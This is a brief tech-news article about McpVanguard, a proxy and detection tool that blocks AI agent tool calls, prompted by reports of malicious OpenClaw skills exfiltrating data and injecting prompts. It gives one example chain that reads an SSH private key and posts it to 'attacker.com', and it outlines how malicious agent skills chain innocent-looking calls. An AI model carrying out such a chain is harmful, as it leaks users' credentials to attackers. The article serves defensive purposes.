McpVanguard Proxy Blocks OpenClaw Skill Data Exfiltration

In response to Cisco's AI security team discovering third-party OpenClaw skills performing silent data exfiltration and prompt injection, a developer has released McpVanguard, a proxy designed to sit between an AI agent and its tools to block malicious calls before they execute.

The Problem: Chained Malicious Calls

The security issue isn't a bug in OpenClaw itself, but a consequence of agents having filesystem access, shell execution, and network calls without enforcement boundaries. Cisco's testing revealed a pattern where seemingly innocent individual calls combine to create a breach, such as:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Neither call appears malicious in isolation, but together they exfiltrate sensitive data. According to the source, ClawHub had over 820 malicious skills at its peak, and CVE-2026-25253 allowed attackers to achieve remote code execution through a single malicious link. Current skill-level validation fails to detect these chained call sequences.

The Solution: McpVanguard Proxy

McpVanguard addresses this by intercepting calls between the agent and its tools. It uses three detection methods:

• Pattern matching
• Semantic intent scoring
• Behavioral chain detection across the entire session

Installation is via pip: pip install mcp-vanguard.

Deeper Layer: VEX Protocol

The project includes a deeper security layer called VEX Protocol, described as a "flight recorder" system. It provides:

• Merkle audit trails for tamper-evident logging
• TPM-rooted agent identity verification
• Syscall-level enforcement

VEX Protocol is built in Rust and development began in December 2023, before OpenClaw gained widespread popularity. The source notes that NVIDIA has recently shipped NemoClaw for similar security purposes, indicating this type of threat isn't going away.

Both projects are available on GitHub:

• McpVanguard repository
• VEX Protocol repository